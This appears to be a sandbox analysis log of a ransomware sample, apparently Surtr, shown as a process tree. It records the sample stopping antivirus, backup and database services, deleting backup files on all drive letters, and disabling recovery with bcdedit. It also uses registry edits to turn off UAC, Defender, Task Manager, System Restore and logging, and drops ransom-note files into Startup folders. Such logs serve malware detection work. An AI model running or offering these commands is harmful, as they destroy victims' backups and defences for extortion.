- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "Sophos File Scanner Service"
  2⤵
  PID:1812
- - C:\Windows\system32\net.exe
    net stop "Sophos File Scanner Service"
    3⤵
    PID:2060
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Sophos File Scanner Service"
      4⤵
      PID:4904
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q H:\*.bac H:\*.bak H:\Backup*.* H:\backup*.*
  2⤵
  PID:4592
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q X:\*.bac X:\*.bak X:\Backup*.* X:\backup*.*
  2⤵
  PID:2192
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "MSSQL$TPSAMA"
    3⤵
    PID:4660
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q J:\*.bac J:\*.bak J:\Backup*.* J:\backup*.*
  2⤵
  PID:2104
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q T:\*.bac T:\*.bak T:\Backup*.* T:\backup*.*
  2⤵
  PID:2964
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q K:\*.bac K:\*.bak K:\Backup*.* K:\backup*.*
  2⤵
  PID:3284
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "Sophos Health Service"
  2⤵
  PID:3260
- - C:\Windows\system32\net.exe
    net stop "Sophos Health Service"
    3⤵
    PID:5044
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Sophos Health Service"
      4⤵
      PID:3296
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q P:\*.bac P:\*.bak P:\Backup*.* P:\backup*.*
  2⤵
  PID:2100
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q U:\*.bac U:\*.bak U:\Backup*.* U:\backup*.*
  2⤵
  PID:3264
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q M:\*.bac M:\*.bak M:\Backup*.* M:\backup*.*
  2⤵
  PID:4112
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q R:\*.bac R:\*.bak R:\Backup*.* R:\backup*.*
  2⤵
  PID:4108
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q F:\*.bac F:\*.bak F:\Backup*.* F:\backup*.*
  2⤵
  PID:5032
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "Sophos MCS Agent"
  2⤵
  PID:3208
- - C:\Windows\system32\net.exe
    net stop "Sophos MCS Agent"
    3⤵
    PID:4280
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Sophos MCS Agent"
      4⤵
      PID:860
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q Y:\*.bac Y:\*.bak Y:\Backup*.* Y:\backup*.*
  2⤵
  PID:5108
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q Q:\*.bac Q:\*.bak Q:\Backup*.* Q:\backup*.*
  2⤵
  PID:4520
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q N:\*.bac N:\*.bak N:\Backup*.* N:\backup*.*
  2⤵
  PID:3456
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q A:\*.bac A:\*.bak A:\Backup*.* A:\backup*.*
  2⤵
  PID:3640
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q L:\*.bac L:\*.bak L:\Backup*.* L:\backup*.*
  2⤵
  PID:1376
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q O:\*.bac O:\*.bak O:\Backup*.* O:\backup*.*
  2⤵
  PID:1144
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q C:\*.bac C:\*.bak C:\Backup*.* C:\backup*.*
  2⤵
  PID:2656
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q W:\*.bac W:\*.bak W:\Backup*.* W:\backup*.*
  2⤵
  PID:3108
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q S:\*.bac S:\*.bak S:\Backup*.* S:\backup*.*
  2⤵
  PID:4944
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "Sophos MCS Client"
  2⤵
  PID:2388
- - C:\Windows\system32\net.exe
    net stop "Sophos MCS Client"
    3⤵
    PID:2532
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Sophos MCS Client"
      4⤵
      PID:920
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q G:\*.bac G:\*.bak G:\Backup*.* G:\backup*.*
  2⤵
  PID:1580
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q Z:\*.bac Z:\*.bak Z:\Backup*.* Z:\backup*.*
  2⤵
  PID:592
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q D:\*.bac D:\*.bak D:\Backup*.* D:\backup*.*
  2⤵
  PID:2840
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q B:\*.bac B:\*.bak B:\Backup*.* B:\backup*.*
  2⤵
  PID:5068
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c bcdedit /set {default} recoveryenabled No
  2⤵
  PID:2364
- - C:\Windows\System32\cmd.exe
    C:\Windows\System32\cmd.exe /c bcdedit /set {default} recoveryenabled No
    3⤵
    PID:5048
  - - C:\Windows\system32\bcdedit.exe
      bcdedit /set {default} recoveryenabled No
      4⤵
      Modifies boot configuration data using bcdedit
      PID:3596
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q V:\*.bac V:\*.bak V:\Backup*.* V:\backup*.*
  2⤵
  PID:5076
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q I:\*.bac I:\*.bak I:\Backup*.* I:\backup*.*
  2⤵
  PID:4540
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q E:\*.bac E:\*.bak E:\Backup*.* E:\backup*.*
  2⤵
  PID:4828
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "Sophos Message Router"
  2⤵
  PID:2032
- - C:\Windows\system32\net.exe
    net stop "Sophos Message Router"
    3⤵
    PID:4904
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Sophos Message Router"
      4⤵
      PID:532
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
  2⤵
  PID:660
- - C:\Windows\System32\cmd.exe
    C:\Windows\System32\cmd.exe /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
    3⤵
    PID:1072
  - - C:\Windows\system32\bcdedit.exe
      bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
      4⤵
      Modifies boot configuration data using bcdedit
      PID:4432
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "Sophos Safestore Service"
  2⤵
  PID:644
- - C:\Windows\system32\net.exe
    net stop "Sophos Safestore Service"
    3⤵
    PID:4436
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Sophos Safestore Service"
      4⤵
      PID:4788
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
  2⤵
  PID:424
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    PID:1812
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "Sophos System Protection Service"
  2⤵
  PID:1716
- - C:\Windows\system32\net.exe
    net stop "Sophos System Protection Service"
    3⤵
    PID:2240
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Sophos System Protection Service"
      4⤵
      PID:2208
    - - C:\Windows\system32\net.exe
        
        net stop "MSSQL$TPSAMA"
        5⤵
        
        PID:2192
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
  2⤵
  PID:2408
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
    3⤵
    PID:4404
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "Sophos Web Control Service"
  2⤵
  PID:2028
- - C:\Windows\system32\net.exe
    net stop "Sophos Web Control Service"
    3⤵
    PID:2104
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Sophos Web Control Service"
      4⤵
      PID:3524
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
  2⤵
  PID:3008
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    PID:4364
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
  2⤵
  PID:3268
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:2512
  - - C:\Windows\system32\net.exe
      net stop "MSSQL$SQL_2008"
      4⤵
      PID:2800
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$SQL_2008"
        5⤵
        
        PID:2100
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLsafe Backup Service"
  2⤵
  PID:1176
- - C:\Windows\system32\net.exe
    net stop "SQLsafe Backup Service"
    3⤵
    PID:948
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLsafe Backup Service"
      4⤵
      PID:4916
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f
  2⤵
  PID:3216
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f
    3⤵
    PID:4088
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLsafe Filter Service"
  2⤵
  PID:4384
- - C:\Windows\system32\net.exe
    net stop "SQLsafe Filter Service"
    3⤵
    PID:2332
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLsafe Filter Service"
      4⤵
      PID:2520
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
  2⤵
  PID:1128
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
    3⤵
    PID:1496
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
  2⤵
  PID:4448
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
    3⤵
    PID:4112
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "Symantec System Recovery"
  2⤵
  PID:3264
- - C:\Windows\system32\net.exe
    net stop "Symantec System Recovery"
    3⤵
    PID:2872
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Symantec System Recovery"
      4⤵
      PID:1284
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
  2⤵
  PID:4424
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
    3⤵
    PID:4656
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
  2⤵
  PID:4860
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
    3⤵
    PID:748
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "Veeam Backup Catalog Data Service"
  2⤵
  PID:4980
- - C:\Windows\system32\net.exe
    net stop "Veeam Backup Catalog Data Service"
    3⤵
    PID:5012
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Veeam Backup Catalog Data Service"
      4⤵
      PID:4764
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
  2⤵
  PID:4752
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
    3⤵
    PID:3964
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
  2⤵
  PID:3280
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
    3⤵
    PID:5036
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "AcronisAgent"
  2⤵
  PID:4460
- - C:\Windows\system32\net.exe
    net stop "AcronisAgent"
    3⤵
    PID:4108
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "AcronisAgent"
      4⤵
      PID:4564
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
  2⤵
  PID:4412
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
    3⤵
    PID:3224
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "AcrSch2Svc"
  2⤵
  PID:5108
- - C:\Windows\system32\net.exe
    net stop "AcrSch2Svc"
    3⤵
    PID:1300
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
  2⤵
  PID:4324
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
    3⤵
    PID:4696
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
  2⤵
  PID:260
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
    3⤵
    PID:280
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "Antivirus"
  2⤵
  PID:268
- - C:\Windows\system32\net.exe
    net stop "Antivirus"
    3⤵
    PID:2200
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Antivirus"
      4⤵
      PID:3680
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
  2⤵
  PID:4544
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
    3⤵
    PID:1632
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
  2⤵
  PID:4516
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
    3⤵
    PID:3400
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "BackupExecAgentAccelerator"
  2⤵
  PID:2460
- - C:\Windows\system32\net.exe
    net stop "BackupExecAgentAccelerator"
    3⤵
    PID:3960
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "BackupExecAgentAccelerator"
      4⤵
      PID:2476
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
  2⤵
  PID:1124
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
    3⤵
    PID:2204
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "BackupExecAgentBrowser"
  2⤵
  PID:3160
- - C:\Windows\system32\net.exe
    net stop "BackupExecAgentBrowser"
    3⤵
    PID:1760
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "BackupExecAgentBrowser"
      4⤵
      PID:2564
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
  2⤵
  PID:500
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
    3⤵
    PID:4532
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
  2⤵
  PID:2864
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
    3⤵
    PID:3276
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "BackupExecDeviceMediaService"
  2⤵
  PID:676
- - C:\Windows\system32\net.exe
    net stop "BackupExecDeviceMediaService"
    3⤵
    PID:3728
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "BackupExecDeviceMediaService"
      4⤵
      PID:3668
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
  2⤵
  PID:2924
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
    3⤵
    PID:4396
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "BackupExecJobEngine"
  2⤵
  PID:1352
- - C:\Windows\system32\net.exe
    net stop "BackupExecJobEngine"
    3⤵
    PID:356
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "BackupExecJobEngine"
      4⤵
      PID:1816
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
  2⤵
  PID:4976
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
    3⤵
    PID:1184
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
  2⤵
  PID:3052
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
    3⤵
    PID:4280
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "BackupExecManagementService"
  2⤵
  PID:3720
- - C:\Windows\system32\net.exe
    net stop "BackupExecManagementService"
    3⤵
    PID:4368
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "BackupExecManagementService"
      4⤵
      PID:4876
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
  2⤵
  PID:3056
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
    3⤵
    PID:3148
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "BackupExecRPCService"
  2⤵
  PID:4452
- - C:\Windows\system32\net.exe
    net stop "BackupExecRPCService"
    3⤵
    PID:520
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "BackupExecRPCService"
      4⤵
      PID:3208
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
  2⤵
  PID:3048
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
    3⤵
    PID:1492
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
  2⤵
  PID:2380
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
    3⤵
    PID:1436
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
  2⤵
  PID:2472
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
    3⤵
    PID:4864
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "BackupExecVSSProvider"
  2⤵
  PID:4344
- - C:\Windows\system32\net.exe
    net stop "BackupExecVSSProvider"
    3⤵
    PID:4076
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "BackupExecVSSProvider"
      4⤵
      PID:4084
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
  2⤵
  PID:2480
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
    3⤵
    PID:504
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "EPSecurityService"
  2⤵
  PID:2348
- - C:\Windows\system32\net.exe
    net stop "EPSecurityService"
    3⤵
    PID:1660
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "EPSecurityService"
      4⤵
      PID:2424
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c mkdir "C:\ProgramData\Service"
  2⤵
  PID:1348
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c mkdir "%TEMP%\Service"
  2⤵
  PID:1700
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "IISAdmin"
  2⤵
  PID:3496
- - C:\Windows\system32\net.exe
    net stop "IISAdmin"
    3⤵
    PID:4048
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "IISAdmin"
      4⤵
      PID:2840
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.hta" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.hta"
  2⤵
  - Drops startup file
  PID:4908
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.txt" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.txt"
  2⤵
  - Drops startup file
  PID:4060
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "IMAP4Svc"
  2⤵
  PID:4540
- - C:\Windows\system32\net.exe
    net stop "IMAP4Svc"
    3⤵
    PID:2360
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "IMAP4Svc"
      4⤵
      PID:2856
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Surtr.exe" "%TEMP%\Service\Surtr.exe"
  2⤵
  PID:4332
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Public_DATA.surt" "%TEMP%\Service\Public_DATA.surt"
  2⤵
  PID:2388
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "macmnsvc"
  2⤵
  PID:3044
- - C:\Windows\system32\net.exe
    net stop "macmnsvc"
    3⤵
    PID:3620
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "macmnsvc"
      4⤵
      PID:2108
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Private_DATA.surt" "%TEMP%\Service\Private_DATA.surt"
  2⤵
  PID:1316
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\ID_DATA.surt" "%TEMP%\Service\ID_DATA.surt"
  2⤵
  PID:4844
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\SURTR_README.hta" "%TEMP%\Service\SURTR_README.hta"
  2⤵
  PID:4432
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "masvc"
  2⤵
  PID:1072
- - C:\Windows\system32\net.exe
    net stop "masvc"
    3⤵
    PID:4804
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "masvc"
      4⤵
      PID:4436
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\SURTR_README.txt" "%TEMP%\Service\SURTR_README.txt"
  2⤵
  PID:1912
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c attrib +R /S "C:\ProgramData\Service"
  2⤵
  PID:4996
- - C:\Windows\system32\attrib.exe
    attrib +R /S "C:\ProgramData\Service"
    3⤵
    - Views/modifies file attributes
    PID:4816
- C:\Windows\system32\cmd.exe
